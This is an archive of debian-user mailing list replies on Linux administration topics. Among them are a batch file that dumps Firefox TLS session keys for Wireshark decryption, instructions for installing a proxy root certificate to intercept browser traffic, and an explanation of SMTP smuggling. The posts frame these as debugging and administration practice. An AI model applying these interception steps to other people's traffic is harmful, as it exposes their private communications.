Re: how2 format a flash drive

2024-07-02 Thread Jeffrey Walton
On Tue, Jul 2, 2024 at 3:53 AM George at Clug  wrote:
>
> Is telemetry evil?  Are guns evil?  Philosophical questions?
>
> I find it objectionable when people gather "telemetry" about "me" and not 
> just the causes of the "blue screens of death".
>
> I find it objectionable when people gather personal "telemetry" and then on 
> sell that information to others for whatever purposes, whether it is to 
> target me with ads, or political analysts like Cambridge Analytica, or to 
> alter my "Social Credit Score", or to be used to cancel my Credit Cards, or 
> for whatever other purpose.

For those interested in reading more, pick up a copy of Shoshana
Zuboff's book The Age of Surveillance Capitalism: The Fight for a
Human Future at the New Frontier of Power
( and
).

Jeff



Re: How to use Wine, How to get Gecko to install and work

2024-07-01 Thread Jeffrey Walton
On Mon, Jul 1, 2024 at 6:33 PM George at Clug  wrote:
>
> To all who replied, Thanks.
>
> Sadly after further testing I still have very little success with Wine.
>
> When I installed WineHQ's Wine Installation, Gecko and Mono were able to be 
> installed. I noticed a rpcss.exe (from memory) in Taskmgr. This at least 
> allowed me to display the initial web page in Wine's Iexplore. But sadly it 
> did not help me in successfully installing the current Windows versions of 
> Firefox or Chrome, or other programs I was having challenges with.
>
> I also tried PlayOnLinux without any success.
>
> The "Time vs ROI" for this endeavour suggests to me, that for now, I should 
> just use Linux native programs.

I think this is probably wandering off-topic, but I'll toss it out there...

When in Rome, do as the Romans do. That means you run Windows programs
on Windows VMs, and Linux programs on Linux VMs. Don't try to use Wine
to run Windows programs on Linux; and don't try to use a POSIX
subsystem to run Linux programs on Windows. Mixing and matching is not
worth the aggravation.

You never stated what problem you are trying to solve. I'm guessing
there's a native Linux replacement for it so you don't need to wine
and iexplore.

Jeff



Re: how2 format a flash drive

2024-06-30 Thread Jeffrey Walton
On Sat, Jun 29, 2024 at 4:13 PM Lee  wrote:
>
> On Tue, Jun 25, 2024 at 7:26 PM George wrote:
> > [...]
> > If you have any grips or difficulties, please mention them.
>
> My gripes and difficulties are the same thing. [...]
> something equivalent to notepad++,

You might give Notepadqq a spin. I've used it in the past, and it has
a comparable look and feel to Notepad++.

.

If TAB works kind of funny, then see this bug report and fix:
.
(I don't know if it was merged).

Jeff



Re: Browser traffic interception/inspection (was: how2 format a flash drive)

2024-06-30 Thread Jeffrey Walton
On Sun, Jun 30, 2024 at 9:46 PM Jeffrey Walton  wrote:
>
> On Sun, Jun 30, 2024 at 9:35 PM Lee  wrote:
> >[...]
> >   ... which is the downside of free software.  Technically, yes, I'm
> > free to build the software with whatever I want enabled, with whatever
> > changes I want added/deleted.
> > In practice, my ability to build Firefox is .. lacking :(
>
> Yeah, trying to build some of these projects is the pits.

One way out of this may be to make a Request for Packaging,
<https://wiki.debian.org/RFP>. Ask for debug builds of Firefox.

Since Debian is now supplying release builds in their release channel,
it might make sense for Debian to provide debug builds for web
developers. Web developers can install firefox-debug as a www-browser
alternative, and do things like debug protocol issues. Regular users
would still get the release version of Firefox, so regular users would
be protected from some of the security problems associated with the
debug build.

And you still might try the nightly build of Firefox, and see if it
provides the features that you are looking for. If the nightly build
has what you need, then you won't have to spend time on the RFP.

Jeff



Re: Browser traffic interception/inspection (was: how2 format a flash drive)

2024-06-30 Thread Jeffrey Walton
On Sun, Jun 30, 2024 at 9:35 PM Lee  wrote:
>
> On Sat, Jun 29, 2024 at 4:45 PM Jeffrey Walton wrote:
> >
> > On Sat, Jun 29, 2024 at 4:13 PM Lee wrote:
> > >
> > > [...] Debian firefox does NOT allow one to do
> > > TLS intercept - ie. this does not work:
> > > C:\UTIL>cat firefox-tlsdecode.bat
> > > set SSLKEYLOGFILE=C:\Users\Lee\AppData\Local\Temp\FF-SSLkeys.txt
> > > start C:\"Program Files\Firefox\Firefox.exe"
> > >
> > > @rem wireshark:
> > > @rem   edit / preferences
> > > @rem   protocols / tls  (v2.6: protocols / ssl)
> > > @rem paste SSLKEYLOGFILE filename into (Pre)-Master-Secret log
> > > filename (was SSL debug file entry)
> >
> > I'm not sure who your complaint is against -- Debian, Firefox or
> > Linux. I'm also not sure that it is a valid complaint.
>
> It is 100% a valid complaint.  And it's a complaint against Debian
> because they're the ones that turned off that functionality.
> They have , I disagree, I'm free to build Firefox for myself,
> get somebody else to do it for me, or get it somewhere else.

It looks like the change is due to NSS (Network Security Services),
not Firefox: <https://bugzilla.mozilla.org/show_bug.cgi?id=908046> and
<https://bugzilla.mozilla.org/show_bug.cgi?id=1183318>. I think the
3318 bug is most relevant, but I may be mistaken.

If I am parsing the various bug reports properly, it looks like
SSLKEYLOGFILE was disabled by default for release builds. It looks
like you might have to perform your own debug build to gain access
again. Or maybe the nightly builds of Firefox will have it.

>   ... which is the downside of free software.  Technically, yes, I'm
> free to build the software with whatever I want enabled, with whatever
> changes I want added/deleted.
> In practice, my ability to build Firefox is .. lacking :(

Yeah, trying to build some of these projects is the pits.

Jeff



Re: sendmail and starttls failing

2024-06-30 Thread Jeffrey Walton
On Sun, Jun 30, 2024 at 6:13 PM Greg Wooledge  wrote:
>
> On Sun, Jun 30, 2024 at 23:08:01 +0100, Tim Woodall wrote:
> > According to this
> > https://support.trustwave.com/kb/KnowledgebaseArticle10016.aspx
> >
> > bare CRs aren't allowed in emails but this has always worked.
> >
> > I'm only likely to have cron generating emails like this.
> >
> > Strange that this would have been changed in a stable release. It
> > doesn't seem to have been a security update.
>
> It looks like it's coming from this change:
>
> https://metadata.ftp-master.debian.org/changelogs//main/s/sendmail/sendmail_8.17.1.9-2+deb12u2_changelog
>
>   * Fix CVE-2023-51765 (Closes: #1059386):
> sendmail allowed SMTP smuggling in certain configurations.
> Remote attackers can use a published exploitation
> technique to inject e-mail messages with a spoofed
> MAIL FROM address, allowing bypass of an SPF protection
> mechanism. This occurs because sendmail supports
> . but some other popular e-mail servers
> do not. This is resolved with 'o' in srv_features.
>
> I don't know the details of how this leads to a security hole.

Take a look at the blog at
.

Jeff



Re: sendmail and starttls failing

2024-06-30 Thread Jeffrey Walton
On Sun, Jun 30, 2024 at 6:08 PM Tim Woodall  wrote:
>
> On Sun, 30 Jun 2024, Tim Woodall wrote:
>
> > On Sun, 30 Jun 2024, Michael Grant wrote:
> >
> >> After an update today, sendmail is refusing to accept mail.  I'm
> >> seeing this in the logs:
> >>
> >
> > Hmmm, this update seems to have done a lot of odd things.
> >
>
> root@dirac:~# mail root
> Cc:
> Subject: test cr
> this
> is^Ma test
> .
> root@dirac:~# mailq
> MSP Queue status...
>  /var/spool/mqueue-client (1 request)
> -Q-ID- --Size-- -Q-Time- 
> Sender/Recipient---
> 45ULV1xk014043   15 Sun Jun 30 22:31 r...@dirac.home.woodall.me.uk
>   (Deferred: 421 4.5.0 Bare carriage return (CR) not allowed)
>   root
>  Total requests: 1
> MTA Queue status...
> /var/spool/mqueue is empty
>  Total requests: 0
>
> According to this
> https://support.trustwave.com/kb/KnowledgebaseArticle10016.aspx
>
> bare CRs aren't allowed in emails but this has always worked.
>
> I'm only likely to have cron generating emails like this.
>
> Strange that this would have been changed in a stable release. It
> doesn't seem to have been a security update.

New SMTP smuggling attack,
.

The short of it is, non-conforming emails and sloppy parsing have led
to a litany of problems including mail spoofing. It has been going on
for years, but now things are changing.

Jeff
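As an added example (not code from the thread), a small Python checker for the condition behind the "421 4.5.0 Bare carriage return (CR) not allowed" deferral in Tim's mailq output, together with the CRLF normalization and dot-stuffing a local script can apply before handing text to sendmail, so that the message has only the standard end-of-data sequence that the SMTP smuggling discussion above turns on. SAMPLE_BODY is a constructed input; treating a bare CR as a line break (rather than deleting it) is an assumption.

```python
import re

# Constructed sample: the body a cron job would hand to sendmail when it prints
# "is^Ma test" (the ^M is a bare CR) on a system whose lines end in LF.
SAMPLE_BODY = b"Subject: test cr\n\nthis\nis\ra test\n"

BARE_CR = re.compile(rb"\r(?!\n)")   # CR not followed by LF
BARE_LF = re.compile(rb"(?<!\r)\n")  # LF not preceded by CR


def find_bare_line_endings(data: bytes):
    """Return (offsets of bare CRs, offsets of bare LFs).

    Both lists empty means every line ending is CRLF, which is the only
    line ending RFC 5321 allows inside SMTP DATA.
    """
    return ([m.start() for m in BARE_CR.finditer(data)],
            [m.start() for m in BARE_LF.finditer(data)])


def is_clean(data: bytes) -> bool:
    """True when the text contains no bare CR and no bare LF."""
    bare_crs, bare_lfs = find_bare_line_endings(data)
    return not bare_crs and not bare_lfs


def to_smtp_data(data: bytes) -> bytes:
    """Rewrite CR, LF and CRLF line endings as CRLF and dot-stuff lines
    that begin with '.', so the only end-of-data marker a receiving server
    can see is the standard <CRLF>.<CRLF> appended by the client.

    Assumption: a bare CR is treated as a line break, not deleted.
    """
    lines = re.split(rb"\r\n|\r|\n", data)
    if lines and lines[-1] == b"":
        lines.pop()  # a trailing line ending leaves an empty tail element
    stuffed = [b"." + line if line.startswith(b".") else line for line in lines]
    return b"\r\n".join(stuffed) + b"\r\n"


if __name__ == "__main__":
    bare_crs, bare_lfs = find_bare_line_endings(SAMPLE_BODY)
    print("bare CR at", bare_crs, "bare LF at", bare_lfs)
    fixed = to_smtp_data(SAMPLE_BODY)
    print("normalized:", fixed)
    print("clean after normalization:", is_clean(fixed))
```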



Re: Browser traffic interception/inspection

2024-06-29 Thread Jeffrey Walton
On Sat, Jun 29, 2024 at 9:37 PM Max Nikulin  wrote:
>
> On 30/06/2024 03:45, Jeffrey Walton wrote:
> > On Sat, Jun 29, 2024 at 4:13 PM Lee wrote:
> >>
> >> [...] Debian firefox does NOT allow one to do
> >> TLS intercept - ie. this does not work:
> >> C:\UTIL>cat firefox-tlsdecode.bat
> >> set SSLKEYLOGFILE=C:\Users\Lee\AppData\Local\Temp\FF-SSLkeys.txt
> >> start C:\"Program Files\Firefox\Firefox.exe"
> [...]
> > I'm not sure who your complaint is against -- Debian, Firefox or
> > Linux. I'm also not sure that it is a valid complaint.
>
> I do not mind to see a link stating that the appropriate logger is
> really disabled. Certainly dumping of TLS session keys may be disabled
> through a compile time flag similar to enforcing signatures for add-ons.
> It may be default Firefox configuration for release builds or some line
> in Debian build rules. It still might be some mistake during attempts to
> enable the logger. I have read about this approach but I have never
> tried it in action.
>
> > Firefox uses its own certificate store.
>
> It is relevant to active traffic interception you described (a proxy).
> Lee prefers passive traffic sniffing and it requires cooperation from a
> peer to get session keys. Each case has its own advantages.

As far as I know, the browsers support active interception. That is,
"interception is a valid use case" for the browsers to support
Dataloss Prevention (DLP) programs. The browsers do that through the
use of interception proxies and root CA's used in the DLP program.

Browsers do not support the passive capture/replay that OP wants. That
is, they don't support exporting the premaster secret or the derived
master secret.

The browsers use tortured logic to arrive at "interception is a valid
use case". They hang it off of the W3C's Design Principles and
Priorities of Constituencies. The browser's argument goes as such: if
a user did not want to be intercepted, then the CA certificate used
for interception would not be present in the certificate store. Since
the proxy's interception certificate is present in the store, the user
wants to be intercepted. (You can't make this shit up).

A corollary to "interception is a valid use case" is, webapps can
never be sure they have a secure channel. Therefore, webapps can only
handle low value data. Higher value data should be handled by hybrid
and native apps.

> At first it was not clear to me that having TLS private key (copied from
> the server) is not enough for passive traffic decryption. Diffie-Hellman
> key exchange scheme allows to generate secret keys even over public
> channel...

Correct. You also need ClientHello.random and ServerHello.random since
the master secret is computed from
(https://datatracker.ietf.org/doc/html/rfc5246#section-8.1):

  master_secret = PRF(pre_master_secret, "master secret",
  ClientHello.random + ServerHello.random)
  [0..47];

Something some folks don't realize is, ClientHello.random and
ServerHello.random are also used for key transport schemes like RSA,
when the client encrypts the premaster secret and sends it to the
server. The ClientHello.random and ServerHello.random are present to
ensure both sides contribute to the master secret. Otherwise, only the
client would contribute to the master secret in a key transport
scheme.

> The main purpose of TLS certificates (public keys in the
> browser or system store) is to confirm that there is no attacker in
> between that blocks packets from the client and establishes its own
> connection to the server.

No, not quite. Interception is a valid use case under the browser's
security model.

You can achieve what you are getting at, but you need to use hybrid
and native apps that practice host public key pinning. You need hybrid
and native apps because they can usually obtain the host's public key.
But the browsers don't expose the host public key to the webapp. So
webapps have no way to perform pinning. You can't even get the public
key from a WebSocket.

> Encryption of email messages using a public
> key is a different case. Session keys are required to debug TLS
> applications.

Email transport security is an absolute mess due to opportunistic
encryption and smart hosts. About the best you can do is, encrypt and
sign the message, and send it over an insecure channel.

Jeff
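To make the master_secret formula quoted above concrete, here is an added Python example (not from the thread or from NSS) that implements the TLS 1.2 PRF from RFC 5246 section 5 with P_SHA256, derives the 48-byte master secret from a pre-master secret plus both Hello randoms, and formats the CLIENT_RANDOM line that the NSS key log file (the SSLKEYLOGFILE Lee's batch file sets, which Wireshark reads) carries for passive decryption. The pre-master secret and randoms in the demo are constructed values; TLS 1.3 uses a different key schedule and different key log labels, which this does not cover.

```python
import hashlib
import hmac
import os


def p_sha256(secret: bytes, seed: bytes, length: int) -> bytes:
    """P_SHA256 data expansion (RFC 5246 section 5):
    A(0) = seed, A(i) = HMAC(secret, A(i-1)),
    output = HMAC(secret, A(1) + seed) + HMAC(secret, A(2) + seed) + ..."""
    out = b""
    a = seed
    while len(out) < length:
        a = hmac.new(secret, a, hashlib.sha256).digest()
        out += hmac.new(secret, a + seed, hashlib.sha256).digest()
    return out[:length]


def prf(secret: bytes, label: bytes, seed: bytes, length: int) -> bytes:
    """PRF(secret, label, seed) = P_SHA256(secret, label + seed) for TLS 1.2."""
    return p_sha256(secret, label + seed, length)


def rsa_pre_master_secret(version: bytes = b"\x03\x03") -> bytes:
    """RFC 5246 section 7.4.7.1 layout for RSA key transport: the client's
    offered protocol version followed by 46 random bytes (48 bytes total)."""
    return version + os.urandom(46)


def master_secret(pre_master_secret: bytes,
                  client_random: bytes, server_random: bytes) -> bytes:
    """RFC 5246 section 8.1: master_secret = PRF(pre_master_secret,
    "master secret", ClientHello.random + ServerHello.random)[0..47].
    Both randoms are mixed in, so each side contributes even when the
    client alone chose the pre-master secret (RSA key transport)."""
    if len(client_random) != 32 or len(server_random) != 32:
        raise ValueError("Hello randoms are 32 bytes each")
    return prf(pre_master_secret, b"master secret",
               client_random + server_random, 48)


def keylog_line(client_random: bytes, master: bytes) -> str:
    """One NSS key log record for a TLS 1.2 session. Wireshark looks the
    session up by ClientHello.random (64 hex chars) and uses the master
    secret (96 hex chars) to derive the record keys."""
    return "CLIENT_RANDOM %s %s" % (client_random.hex(), master.hex())


if __name__ == "__main__":
    # Constructed values standing in for real handshake data.
    pms = b"\x03\x03" + bytes(46)
    client_random = bytes(range(32))
    server_random = bytes(range(32, 64))
    ms = master_secret(pms, client_random, server_random)
    print(keylog_line(client_random, ms))
    # A different ServerHello.random yields a different master secret.
    print(master_secret(pms, client_random, bytes(32)) != ms)
```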



Browser traffic interception/inspection (was: how2 format a flash drive)

2024-06-29 Thread Jeffrey Walton
On Sat, Jun 29, 2024 at 4:13 PM Lee  wrote:
>
> [...] Debian firefox does NOT allow one to do
> TLS intercept - ie. this does not work:
> C:\UTIL>cat firefox-tlsdecode.bat
> set SSLKEYLOGFILE=C:\Users\Lee\AppData\Local\Temp\FF-SSLkeys.txt
> start C:\"Program Files\Firefox\Firefox.exe"
>
> @rem wireshark:
> @rem   edit / preferences
> @rem   protocols / tls  (v2.6: protocols / ssl)
> @rem paste SSLKEYLOGFILE filename into (Pre)-Master-Secret log
> filename (was SSL debug file entry)

I'm not sure who your complaint is against -- Debian, Firefox or
Linux. I'm also not sure that it is a valid complaint.

Firefox uses its own certificate store. If you want to proxy your
traffic, then the proxy's root cert needs to be in Mozilla's
certificate store. See
.

Chrome is different. Chrome uses the Windows store by default, but
also has its own certificate store. For Chrome, your Windows admin can
make a change with a Group Policy, and Chrome will pick it up through
the Windows certificate store. Or you can manually install the proxy's
root cert. See 
.

Debian is not concerned about TLS interception in this case. But for
completeness, Debian has its own store at /etc/ssl/certs. You get the
certificates by installing the ca-certificates package. You can
install certificates into the store by dropping the root cert on the
filesystem at /usr/local/share/ca-certificates, and then running
update-ca-certificates. See
 and
.

When you are intercepting/inspecting traffic, you typically set up your
proxy, and then proxy Firefox and Chrome traffic through your proxy.
The proxy can run on your local machine, like 127.0.0.1. Your proxy's
root certificate should be in the browser's store (as described
above).

Jeff



Re: balenaEtcher

2024-06-28 Thread Jeffrey Walton
On Fri, Jun 28, 2024 at 5:16 PM Stefan Monnier  wrote:
>
> > I've been trying to boot a flash usb of 4Gb with
> > balenaEtcher-1.19.-21-x64.AppImage and Parrot-home-4.4_i386.iso and gives
> > me the Error:(0, h.requestMetadata) is not a function
>
> Who/what gives you this error?  When does it give you this error?
>
> Have you tried to ask your favorite search engine about
> "Error:(0, h.requestMetadata) is not a function"?

It looks like a question about Parrot OS.

Maybe it is more appropriate for .

Jeff



Re: About dash as sh

2024-06-24 Thread Jeffrey Walton
On Mon, Jun 24, 2024 at 2:16 AM Nicolas George  wrote:
>
> Stefan Monnier (12024-06-21):
> > And if it's not a tty, you get some kind of Undefined Behavior?
>
> Knowing that “undefined behavior” is just an expression invented by C
> standards authors to make “we make no guarantee about it, use it at your
> own risk” sound more scary, I do not think it is a severe problem.

Do shells suffer UB? I always thought that was a C thing.

When I encounter UB in C, I drop into inline assembler since asm does
not suffer C's undefined behavior.

Jeff



Re: System time/timezone, was Re: Maximum size .bash_aliases file

2024-06-22 Thread Jeffrey Walton
On Fri, Jun 21, 2024 at 12:18 AM David Wright  wrote:
> [...]
> Well, that's a mouthful. And what am I to call the time that a system
> issues using that system default time zone?

The kernel clock counts ticks. The ticks are relative to Epoch, which
is UTC. Ticks are what you see in the output of dmesg. So maybe call
it UTC, GMT or Zulu?

> If I boot up two computers
> and they display different times, what term is appropriate in your
> opinion to describe the time displayed?

The NTP folks call them timekeepers when they are correct, and
falsetickers when they are incorrect. But "them" are timeservers
participating in the NTP protocol. See
 and RFC 5905,
.

If the OS is not keeping accurate time, then I would call it a falseticker.

If you only boot two computers, then you cannot be sure which computer
is the falseticker. You need three or more time sources to determine
which is the falseticker. As the saying goes, a person with a watch
knows what time it is. A person with two watches is never sure.

Jeff
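An added Python example (not from the thread or from the NTP reference code) of why three sources are needed: it runs Marzullo's interval intersection, the idea behind the RFC 5905 selection algorithm, over each source's offset and maximum error, keeps the largest set of sources whose error intervals overlap, and names the rest falsetickers. The machine names and offsets are constructed; requiring a strict majority for a verdict is an assumption.

```python
from typing import List, Optional, Tuple

# (name, measured offset from local clock in seconds, maximum error in seconds)
Source = Tuple[str, float, float]


def intersection_interval(sources: List[Source]) -> Tuple[float, float, int]:
    """Marzullo's algorithm: sweep the interval endpoints in order and find the
    sub-interval contained in the largest number of source intervals.
    Returns (low, high, count)."""
    edges = []
    for _name, offset, max_error in sources:
        edges.append((offset - max_error, -1))  # interval start
        edges.append((offset + max_error, +1))  # interval end
    edges.sort()  # at equal points a start (-1) sorts before an end (+1)
    best, count, low, high = 0, 0, 0.0, 0.0
    for i, (point, kind) in enumerate(edges):
        if kind == -1:
            count += 1
            if count > best:
                # This start opens the best overlap so far; it lasts until the
                # next edge (a start raises the count again, an end closes it).
                best, low, high = count, point, edges[i + 1][0]
        else:
            count -= 1
    return low, high, best


def classify(sources: List[Source]) -> Optional[Tuple[List[str], List[str]]]:
    """Split sources into (truechimers, falsetickers). A truechimer's interval
    contains the majority intersection; with no strict majority (for example
    two sources that disagree) the answer is None: undetermined."""
    low, high, count = intersection_interval(sources)
    if count * 2 <= len(sources):
        return None
    truechimers, falsetickers = [], []
    for name, offset, max_error in sources:
        if offset - max_error <= low and offset + max_error >= high:
            truechimers.append(name)
        else:
            falsetickers.append(name)
    return truechimers, falsetickers


# Constructed readings: two machines agree to within a few ms, one is 30 s off.
THREE_CLOCKS: List[Source] = [
    ("laptop", 0.000, 0.010),
    ("desktop", 0.002, 0.010),
    ("server", 30.000, 0.010),
]

if __name__ == "__main__":
    print("three clocks:", classify(THREE_CLOCKS))
    # Only laptop and server: one watch says one thing, the other another.
    print("two clocks:  ", classify([THREE_CLOCKS[0], THREE_CLOCKS[2]]))
```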



Re: mounting external hard drive from rescue mode shell?

2024-06-22 Thread Jeffrey Walton
On Sat, Jun 22, 2024 at 10:48 AM Richard Owlett  wrote:
> [...]
> Thank you for reminding me of live images just now. Perfect timing.
> I have an i386 machine with some atypical constraints.
> https://www.debian.org/CD/live/ states only amd64 images are currently
> available.
>
> Questions:
>1. What is latest i386 live image available in some archive?
>2. I have a working machine that will take a current full install
>   of an i386 system. Can an average user create his own i386 live
>   install image?

According to :

We don't store/serve the full set of ISO images for all
architectures, to reduce the amount of space taken up on the mirrors.
You can use the jigdo tool to recreate the missing ISO images instead.

The link provided for the jigdo tool is
.

Jeff



Re: Modifying Desktop Icons

2024-06-20 Thread Jeffrey Walton
On Tue, Jun 18, 2024 at 12:23 AM Gareth Evans  wrote:
>
> On 17 Jun 2024, at 20:45, Pranjal Singh  wrote:
>
> I am trying to modify the Firefox desktop icon so that it opens
> an incognito window by default.
> ...
>
> - Exec=firefox %u
> + Exec=firefox -private-window %u
>
> Assuming that's not a typo, please try:
>
> --private-window
>
> (NB two hyphens at the beginning)
>
> This works for me on Mate.

According to Mozilla documentation at
, it is one
hyphen, not two.

Jeff



Re: suggestion of upgrade to 12

2024-06-20 Thread Jeffrey Walton
On Thu, Jun 20, 2024 at 10:08 AM Richard  wrote:
>
> The question with Linux isn't if there's a need to update to the latest 
> version (of the distro) like on Windows, but rather what's keeping you from 
> updating? If there's no urgent reason to stick to 11, update. 11 is now 
> oldstable and will become oldoldstable mid next year. Thus, it currently 
> becomes fewer updates - no idea how the situation is with security updates 
> compared to stable. 10 reaches end of life in about a month or so. So that's 
> the timetable you'll need to keep in mind. Of course, right now there isn't 
> anything forcing you to update, you merely need to update within the next two 
> years to keep getting updates. But chances are very low with more 
> conservative distros like Debian that upgrading will have more drawbacks than 
> benefits. Of course it can always be a smart choice to wait for the first one 
> or two dot releases, as they will fix issues previously unnoticed or where 
> the fix wasn't ready on time. But that's all.

One additional data point to consider... there are folks who have
exploits written for vulnerabilities that the community does not know
about.

Generally speaking, the older the software, the more exploits are
available. Developers generally don't work on old versions of their
software. Instead, they fix some things, release a new version and
move on. The only chance to fix the vulnerability is move to a newer
version of the software by building it yourself or using the latest
distro release.

Folks who deal in vulnerabilities and exploits adore the old software
because nothing gets fixed, so their exploits continue to work on old
versions of software. As Greg Kroah-Hartman noted: [1]

We have a very bad history of keeping bugs alive for a long time.
Somebody did a check of it, most known bugs live for five years in
systems. These are things that people know and know how to exploit.
They’re not closed. That’s a problem in our infrastructure...

CVE tracking is not the answer because that assumes every exploitable
bug is tagged with a CVE. There are lots of bugs out there that are
not tracked with a CVE, yet are exploitable. See, for example, the
TTY1 layer bug discussed in [1]. It took over 3 years to figure out it
was exploitable and for the patches to be backported.

(I have first hand knowledge of how one firm operates. The firm sells
their exploits to Northrop Grumman Electronic Warfare Division.)

[1] 
https://thenewstack.io/design-system-can-update-greg-kroah-hartman-linux-security/

Jeff

> Am Do., 20. Juni 2024 um 09:58 Uhr schrieb Jeff Peng :
>>
>> I am running a small mailserver with debian 11 for many years. It's
>> quite solid.
>> Though I have read this article:
>> https://www.cherryservers.com/blog/debian-12-bookworm-release
>> do you think there is any need for me to upgrade from 11 to 12?
>> just for the newer software like postfix, dovecot?
>>
>> Thanks.



Re: UEFI secure boot issue

2024-06-20 Thread Jeffrey Walton
On Thu, Jun 20, 2024 at 9:23 AM Bhasker C V  wrote:
>
> I generated a pr/pk pair and the kernel is signed. Placed them in the
> kernel tree and compiled the kernel.

I don't think you are supposed to check-in/compile-in the private key.
It is usually supposed to stay private.

> Could someone tell me what am I doing wrong please ?
>
> Below is the status (I am using loader.efi from linuxfoundation)
> When i boot debian stock kernel signed, i see that the secure boot
> gets enabled (hence bios and everything else seems to be fine with the
> same UEFI loader).
> However, when I boot the compiled kernel I get
>
> $ dmesg | grep -i secure
> [0.007085] Secure boot could not be determined
>
>
> $ sbverify --list bootx64.efi
> warning: data remaining[91472 vs 101160]: gaps between PE/COFF sections?
> signature 1
> image signature issuers:
>  - /C=US/ST=Washington/L=Redmond/O=Microsoft Corporation/CN=Microsoft
> Corporation UEFI CA 2011
> image signature certificates:
>  - subject: /C=US/ST=Washington/L=Redmond/O=Microsoft
> Corporation/OU=MOPR/CN=Microsoft Windows UEFI Driver Publisher
>issuer:  /C=US/ST=Washington/L=Redmond/O=Microsoft
> Corporation/CN=Microsoft Corporation UEFI CA 2011
>  - subject: /C=US/ST=Washington/L=Redmond/O=Microsoft
> Corporation/CN=Microsoft Corporation UEFI CA 2011
>issuer:  /C=US/ST=Washington/L=Redmond/O=Microsoft
> Corporation/CN=Microsoft Corporation Third Party Marketplace Root
> $ sbverify  --list ./loader.efi
> signature 1
> image signature issuers:
>  - /C=GB/ST=England/L=London/O=BHASKER/CN=bcvm.bcvm.bcv
> image signature certificates:
>  - subject: /C=GB/ST=England/L=London/O=BHASKER/CN=bcvm.bcvm.bcv
>issuer:  /C=GB/ST=England/L=London/O=BHASKER/CN=bcvm.bcvm.bcv
> $ sbverify  --list ../../linux/k.bcv
> signature 1
> image signature issuers:
>  - /C=GB/ST=England/L=London/O=BHASKER/CN=bcvm.bcvm.bcv
> image signature certificates:
>  - subject: /C=GB/ST=England/L=London/O=BHASKER/CN=bcvm.bcvm.bcv
>issuer:  /C=GB/ST=England/L=London/O=BHASKER/CN=bcvm.bcvm.bcv


Have a look at , and the use of
the Machine Owner Key (MOK).

Jeff



Re: System time/timezone, was Re: Maximum size .bash_aliases file

2024-06-19 Thread Jeffrey Walton
On Thu, Jun 20, 2024 at 12:52 AM  wrote:
>
> On Wed, Jun 19, 2024 at 01:01:44PM -0400, Jeffrey Walton wrote:
> > On Wed, Jun 19, 2024 at 7:09 AM Greg Wooledge  wrote:
>
> [...]
>
> > > I strongly disagree.  The system clock is kept on "epoch time", which
> > > is the number of seconds since midnight, January 1, 1970 UTC.
> > >
> > > The system clock doesn't have a time zone of its own.  It just gets
> > > converted to a time and date within any given time zone on demand.
> >
> > ++.
> >
> > The sharp edge is how the RTC clock is set - UTC or localtime. Also
> > see <https://wiki.debian.org/DateTime>.
>
> Please don't mix those three things, that makes them just more confusing.
>
> The original topic was the system's time zone. This hasn't anything
> to do with the RTC clock, and only peripherally with "the system's
> time zone" (of which some, me included, say "there's no such thing",
> and others disagree :)
>
> You have
>
>  - the RTC clock. This is *only* looked at at boot time, to init
>the system clock (and when you, as an admin, do "hwclock").
>During those operations, it's important to know which timezone
>the RTC is in, since this one /is/ in "human format". It was
>intended to be read and set by humans, like your kitchen clock,
>back then.
>
>  - the system clock: it boringly counts seconds. Since Epoch.
>Since it hasn't hours or minutes, let alone weeks or months,
>time zones don't even make sense to it. Sometimes it does
>a leap second, but experts are torn on whether this was a
>good idea at all. Have a look at [1] for an entrance to yet
>another deep time rabbit hole.
>
>  - timezones and stuff: those happen whenever you want to convert
>the system clock to hours, minutes, days, and other human
>related stuff and back.
>
> (if you have good net connectivity, reading the RTC at boot can
> be shunned completely, you don't need it anymore).

Don't forget boottime and the delta between boottime and the monotonic
clock. You'll need them to explain this:

$ TZ=America/New_York dmesg -T | head -1
[Wed Jun 19 01:50:14 2024] Linux version 6.9.4-200.fc40.x86_64 (mockbuild@d372fa1a67e347178b7bd422ead09b96) (gcc (GCC) 14.1.1 20240607 (Red Hat 14.1.1-5), GNU ld version 2.41-37.fc40) #1 SMP PREEMPT_DYNAMIC Wed Jun 12 13:33:34 UTC 2024

$ TZ=America/California dmesg -T | head -1
[Wed Jun 19 05:50:14 2024] Linux version 6.9.4-200.fc40.x86_64 (mockbuild@d372fa1a67e347178b7bd422ead09b96) (gcc (GCC) 14.1.1 20240607 (Red Hat 14.1.1-5), GNU ld version 2.41-37.fc40) #1 SMP PREEMPT_DYNAMIC Wed Jun 12 13:33:34 UTC 2024

> Please, keep those three at a safe distance

I'm not sure how you can disgorge them given they contribute to a
human readable time.

Jeff



Re: System time/timezone, was Re: Maximum size .bash_aliases file

2024-06-19 Thread Jeffrey Walton
On Wed, Jun 19, 2024 at 7:09 AM Greg Wooledge  wrote:
>
> On Tue, Jun 18, 2024 at 23:09:04 -0500, David Wright wrote:
> > On Tue 18 Jun 2024 at 07:07:36 (-0400), Greg Wooledge wrote:
> > > On Mon, Jun 17, 2024 at 23:54:03 -0500, David Wright wrote:
> > > > What should I call the timezone of my computer when it's booted up and
> > > > no users are logged in?
> > >
> > > Daemons will almost always use the system's default time zone (the one
> > > specified by /etc/localtime or /etc/timezone).
> > >
> > > It's *theoretically* possible for some daemons to be configured to use
> > > a different time zone, or to be hard-coded to use UTC.  I've never seen
> > > this, but it could be done.
> >
> > In view of that, I think it's reasonable to drop the "default",
> > and go with "system time zone", ie the time zone that the system
> > clock it set to.
>
> I strongly disagree.  The system clock is kept on "epoch time", which
> is the number of seconds since midnight, January 1, 1970 UTC.
>
> The system clock doesn't have a time zone of its own.  It just gets
> converted to a time and date within any given time zone on demand.

++.

The sharp edge is how the RTC clock is set - UTC or localtime. Also
see .

Jeff



Re: System time/timezone, was Re: Maximum size .bash_aliases file

2024-06-18 Thread Jeffrey Walton
On Tue, Jun 18, 2024 at 4:05 AM  wrote:
> On Mon, Jun 17, 2024 at 11:54:03PM -0500, David Wright wrote:
> > [...]
> >   $ date; timedatectl status
> >   Mon Jun 17 23:51:43 CDT 2024
> >  Local time: Tue 2024-06-18 04:51:43 UTC
> >  Universal time: Tue 2024-06-18 04:51:43 UTC
> >RTC time: Tue 2024-06-18 04:51:43
> >   Time zone: Etc/UTC (UTC, +)
> >   System clock synchronized: yes
> > NTP service: active
> > RTC in local TZ: no
> >   $
> >
> > I notice that   man timedatectl   says:
> >
> >set-timezone [TIMEZONE]
> >Set the system time zone to the specified value.
> >Available timezones can be listed with list-timezones.
> >If the RTC is configured to be in the local time, this
> >will also update the RTC time. This call will alter
> >the /etc/localtime symlink. See localtime(5) for more
> >information.
>
> I cringe a bit when I see that.

